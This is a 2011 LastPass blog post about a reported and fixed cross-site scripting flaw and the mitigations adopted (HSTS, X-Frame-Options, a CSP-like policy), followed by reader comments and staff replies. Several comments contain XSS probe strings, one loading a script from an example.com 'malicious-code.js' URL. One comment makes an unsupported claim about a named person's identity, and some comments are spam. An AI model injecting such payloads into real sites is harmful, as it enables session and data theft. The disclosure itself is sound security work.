Feb 27, 2011

Cross Site Scripting vulnerability reported, fixed

While no client data was impacted, we were notified at ~3pm Eastern time yesterday of a non-persistent cross site scripting vulnerability on the LastPass.com website. By 5:30pm it was fixed, tested and deployed; closing the hole. It's important to note that this was not a flaw with the extensions, and could only be potentially exploited if you visited a malicious site that was setup to exploit this flaw while you were logged into LastPass.

The cause of this issue was with our testing procedure for this particular case, which has been rectified. Our logs indicate that there's no sign of this being successfully utilized (beyond the person who found it). We've made a number of changes to improve security on the LastPass.com website and help reduce the chance of a recurrence of this kind of issue:

1) Implemented HSTS: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security This will ensure browsers that support it (Chrome and Firefox 4) will be forced to stay on secure SSL web requests for the lastpass.com domain.

2) Increased our input filtering and stateful inspection.

3) We've implemented X-Frame-Options https://developer.mozilla.org/en/the_x-frame-options_response_header which would make an attack like this more difficult to exploit as it makes it impossible for our pages to be embedded in another page via an iframe/frame.

4) We've begun implementing something very similar to Content Security Policy (CSP) https://wiki.mozilla.org/Security/CSP/Specification LastPass is a browser extension so we can implement this today and we can roll it out far more quickly than the browsers themselves will support it.

We believe this issue to be resolved but are continuing to audit and implement ways to further mitigate risk. If you would like to take extra precautions in the interim a good security practice would be to avoid keeping yourself logged into LastPass if you're visiting websites of ill repute.

CSP is a big step forward in risk reduction from this kind of attack. While we're disappointed we missed this case up-front we're pleased that will lead to an even stronger product in the near term.

For those wanting to learn more about non-persistent Cross Site Scripting (XSS) you can read about it here: http://en.wikipedia.org/wiki/Cross-site_scripting

Our thanks to Mike Cardwell for responsibly reporting this issue.

LastPass

47 comments:

  1. "Implemented HSTS: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security This will ensure browsers that support it (Chrome and Firefox 4) will be forced to stay on secure SSL web requests for the lastpass.com domain."

    So what about IE?

    ReplyDelete
  2. @Anonymous Good point. If you're using IE8 or above it includes an XSS (cross site scripting) filter, and was likely immune to this attack:

    http://msdn.microsoft.com/en-us/library/dd565647(v=vs.85).aspx

    ReplyDelete
  3. I think this has always been one of my hesitations in fully utilizing LastPass - e.g. the fact that user data can be accessed via the website login. For what it's worth, I think LastPass would've been much wiser to exclude this and only have LastPass as a browser extension. There is no need to have LastPass via the website that I can think of. I mean, there's all the browser extensions, the mobile apps, the USB apps, the pocket app....so to me, it's just opening up the service to a possible flaw, which in this case, has come true. While I applaud LastPass for being open and transparent, I think they are holding themselves back with some of the decisions they make with regard to the service. Many people in my tech circles have expressed nervousness at having their data seemingly so easily accessible via the site login and therefore they aren't using the service.

    ReplyDelete
  4. I wrote a comment and it appears to have magically disappeared after I saw it for 60 seconds. Are you censoring comments, LastPass? If so, this is a shame.

    ReplyDelete
  5. I'm very impressed with the transparency and speed with which you've responded to this issue. Kudos to LastPass, and also to Mike Cardwell for reporting this issue so that it could be resolved before going public.

    Obviously LastPass's business depends on the trust of its users. While ideally this should never have happened, you have responded in such a way that it is the next best thing.

    ReplyDelete
  6. FYI, yhe original article talking about this vulnerability is here:

    https://grepular.com/LastPass_Vulnerability_Exposes_Account_Details

    ReplyDelete
  7. I agree with Nick. While not a really serious vulnerability that would've exposed our passwords, ideally you don't want this thing to happen. But the quick response and this blog post explaining what has been done to protrect users against this in the future is a good way (at least for me) to keep trusting LastPass. Openness is the way to go in these situations, and you guys handled it pretty well.

    ReplyDelete
  8. Thanks for the quick resonse and dealing with the problem in a proper way.

    ReplyDelete
  9. @Anonymous (filtering question) -- we're not filtering, (except for spam) please feel free to repost.

    ReplyDelete
  10. Pride before a fall. The arrogance repeatedly displayed by Lastpass virtually assured failure. Very likely it will happen again only on a more massive scale.

    You were advised you had a problem and now brag how quickly you responded.

    You do realize anyone who truly plans to exploit your allegedly secure system will not bother to inform you and will instead let you blithely go on blowing your own horn.

    Why don't you place a million dollars in escrow assuring no one can blow down your house of cards and we'll see how fast it falls?

    ReplyDelete
  11. @Anonymous (Pride):

    They don't seem to be bragging here, and they even stated their own disappointment in their performance. What more do you want? Nobody is perfect; even if they'll never get there, at least they are reaching for that goal.

    You do realize that that is the case (it will fail, given enough effort) with anything having anything to do with security, right? If you have such little confidence, you shouldn't trust them with your data...it's as simple as that.

    ReplyDelete
  12. What does "logged into LastPass" mean? Having entered your credentials on the LP website in the browser? Or for the extension as well?

    ReplyDelete
  13. I have the same question. What does logged into LastPass mean? Do I need to take the same precautions when I am using the extensions on Chrome / FF or just when logged into LP website?

    ReplyDelete
  14. This exploit was performed several months ago by Ari Silverstein on alt.privacy.* (Ari is known to be ex-CIA NOC IT technician Frank Camper). Nothing new here but apparently this was overlooked by LastPass.

    ReplyDelete
  15. Thanks for the transparency and quick response. It's all about trust, and this kind of reaction is reassuring. Keep up the good work.

    ReplyDelete
  16. I don't understand why everyone is making such a big deal about HSTS. HSTS is just a method by which the application server suggests to the web client that a best effort should be made to use HTTPS. There are more reliable ways to force and require HTTPS connections from the application layer. Are there actual use cases in which a lastpass client would even fail back to an HTTP connection? Do the lastpass application servers even accept secure data over non-secure connections?

    ReplyDelete
  17. @MrVJTod The big deal is for 2 potential reasons from LastPass' point of view:

    1) We can make a very long expiration (we haven't yet but are about to). Once we do if you're using public WIFI, and just type 'lastpass.com', before HSTS you could have DNS spoofed, have that request intercepted and be sent to 'https://lastpasss.com' never being the wiser.

    2) A preload list is out there and we're attempting to be put on it -- once that happens every browser that supports it will automatically know that if you type 'lastpass.com' you mean 'https://lastpass.com'

    You're right that many of the application requests are limited anyway to SSL (our main session cookie is 'secure' so it can't be used for any http request). This is mostly for the 'before you get to https://LastPass.com' part...

    ReplyDelete
  18. @MrVJTod I also forgot to mention not allowing users to accept SSL errors; potentially saving a user from themselves.

    ReplyDelete
  19. Good Job Mike and Lastpass

    ReplyDelete
  20. It's good that no client data have been affected.

    ReplyDelete
  21. @Joe

    I'd still like to hear from you about Mike Cardwell's statement where he indicated that users LP site credentials can likely be compromised through future javascript exploits. I'm seriously considering going back to offline password management. What do you say?

    ReplyDelete
  22. I still have not seen the explanation of what being "logged out" means. Whether it is just from the program or from the extensions as well.

    ReplyDelete
  23. @Anonymous (Logged Out) - Logged out means from the website/extension. If you logout from the extension it logs out of both, if you logout from the website it should also log you out of both.

    ReplyDelete
  24. @Anonymous (offline) -- We've done a fair amount since Mike made that statement. We certainly have lived in fear of a 'persistent' cross site scripting attack -- one where both your encryption key and the XSS code are in the same place at the same time.

    This is a very real threat (but not the same one that occurred above). A very strong response to this potential threat is the proper use of Content Security Policy (CSP) or something like it if it's not available. This is why I'm so focused on that piece right now -- even this persistent XSS case would be very mitigated CSP preventing data that could be gathered by a persistent XSS from leaving the page. I did a post today on us going live with CSP if you utilize Firefox 4.

    Frankly a XSS shouldn't happen; but it did and we're embarrassed that it did. Mike's right that we should have assumed that it would happen and have another protection layer -- that layer is CSP.

    ReplyDelete
  25. @Anonymous (Deleting comments) -- I visited the comment spam section of blogger today and found your comment and it has been restored. We're not trying to filter, but we're clearly not checking the automated spam filters much either.

    ReplyDelete
  26. Why no make it an option to disable login through the website and only make last-pass functionality available through the plugin/app?

    ReplyDelete
  27. Joe - thanks for these answers - and even thanks for replying to those that for some reason feel they must remain anon...

    Great product and response to the issues...

    ReplyDelete
  28. is there a way where my data remains off lastpass servers? i have always been Leary of any password security site that has my data and someone therefore can de-encrypt it/un-encrypt/break?
    i prefer to have my data only on my machine in an encrypted mode. would this exploit have been possible with the gizmo that lass pass sold? A usb plug in that was supposed to be the super secure method?
    i also don't remember reading that last pass was a yearly subscription fee rate, i thought it was like roboform, pay for it once, like i did with roboform and have used it through upgrades for probably at least 7 years or longer. I do have issues with roboforms security, since they do not encrypt the sites you have saved, that has made me change to last pass. But for a yearly fee, i can encrypt my roboform file with true crypt and place it in apictures in dropbox, that will solve that, including robotogo, since "RF" support said it was not possible to encrypt/hide the user sites andi realize they were open to anyone who uses my machine. If someone knows you have an account at certain banks/financial institution, that is the first step to the crack.
    posting as anonymous in a forum like this is smarter than letting people know to look in your pictures for a true crypt file, not that i know good security chops set up yet. i need to learn how to set up a Proxy as a start.
    better thqan the peopl ein my apasrtmrnt building, here they installed a creditcard/debit card only payment method for a laundry card. might as well email russianmafia.com you cc number.

    ReplyDelete
  29. Congratulations to the LP team for their honest attribute, not only in this current situation, but in general (they answer technical questions openly, communicate with the users providing clear answers that do not underestimate our intelligence, instead of hiding behind marketing speech, etc).

    Trying to implement a secure service of this kind over platforms/technologies that are so inherently hard to control/predict/secure, while maintaining the experience that users relatively unfamiliar with computers expect, is a constant struggle.

    Even though normally I wouldn't consider using/paying for a service of this kind, exactly because I understand those difficulties (privacy of associated URLs is important to me), after having been browsing the forum for the last past hour and seeing the staff's responses there, I'm convinced to give it a try for non-critical stuff.

    Keep it up!

    ReplyDelete
  30. PS.

    "(privacy of associated URLs is important to me)"

    not really related to the previous point, so I shouldn't have put it there. This is really a separate point that I had in my mind and popped at the wrong place: Apart from passwords, I also care for the privacy of other information that are not directly sensitive, need to be more available, and thus are not protected so much, most notably, the URLs. I definitely wouldn't like someone fetching a list of the locations to which I maintain accounts.

    Sorry for the long posts, again thanks for the direct communication LP team.

    ReplyDelete
  31. is there a way where my data remains off lastpass servers? i have always been Leary of any password security site that has my data and someone therefore can de-encrypt it. i realize that the data is encrypted, but if someone traps my master PW, they have everything. It could be a rogue employee with a hefty payoff and a one way ticket.
    i prefer to have my data only on my machine in an encrypted mode. would this exploit have been possible with the gizmo that lass pass sold with the pro version? the usb plug in that was supposed to be the super secure method?
    i also don't remember reading that last pass pro was a yearly subscription rate, i thought it was like roboform, pay for it once, like i did with roboform and have used it through upgrades for probably at least 7 years or longer. I do have issues with roboform's security , since they do not encrypt the sites you have saved, that has made me change to last pass. i guess i could encrypt my roboform file with true crypt and solve that, including robotogo, since they "RF" said it was not possible to encrypt/hide the user sites and they were open to anyone who used your machine. if someone knows you have an account at certain banks/financial institution, that is the first step to the crack.
    with roboform i always logged into my sites via robo log in feature, since it was faster and easier. over the years i noticed that if a site that i had used before was not working with roboform, alarm bells were going off to be careful.
    i am not sure if using a official lastpass bookmark would prevent this type of vulnerability.
    i also noticed my earlier post is missing.

    ReplyDelete
  32. I still love my LastPass! Thanks for putting out such a great product and staying on top of potential security issues. There are certian passwords I have been reluctant to enter into LastPass such as banking, but for all my other stuff I'm glad to have you there.

    ReplyDelete
  33. Always good to be pro-active good job!

    ReplyDelete
  34. That's right Sam, otherwise, this vulnerability could expose users to risk.

    ReplyDelete
  35. <% String eid = request.getParameter("eid"); %>

    ReplyDelete
  36. hi<%3cscript>alert('hello')

    ReplyDelete
  37. %3cscript%3e alert(''hello')%3c/script%3e

    ReplyDelete
  38. %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e

    ReplyDelete
  39. We need to be very cautious. If XSS attacks, it may not only destroy our websites, it can take down our company as well.

    ReplyDelete
  40. Non-persistent cross site scripting vulnerability could cause a site to go down or worse, you can get the website hacked and could cause severe damages.

    web design norwich

    ReplyDelete
  41. You belong to the 0.1% of website owners who take these corrective actions to protect against the risks that potential XSS attacks could pose to the security and privacy of your products and their userbase. Congrats LastPass staff ;)

    ReplyDelete
  42. "Implemented HSTS: http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security This will ensure browsers that support it (Chrome and Firefox 4) will be forced to stay on secure SSL web requests for the lastpass.com domain."

    So what about IE?

    I would also like to know about IE as that is all I use.

    ReplyDelete
  43. Love my Last Pass program... slowly moved over from 1Password, I just like LastPass better :-)
    Macbook Pro & iPhone
    Andy :-)

    ReplyDelete
  44. bigg boss 8 iѕ one оf the most controversial TV reality show on thеir own Indian TV, presented by Colors TV. The reality show іѕ produced under thе production house оf Endemol Production House.

    ReplyDelete
  45. I just want to let you know that I just check out your site and I find it very interesting and informative. I can't wait to read lots of your posts
    labor day 2014 sales
    labor day sales 2014

    ReplyDelete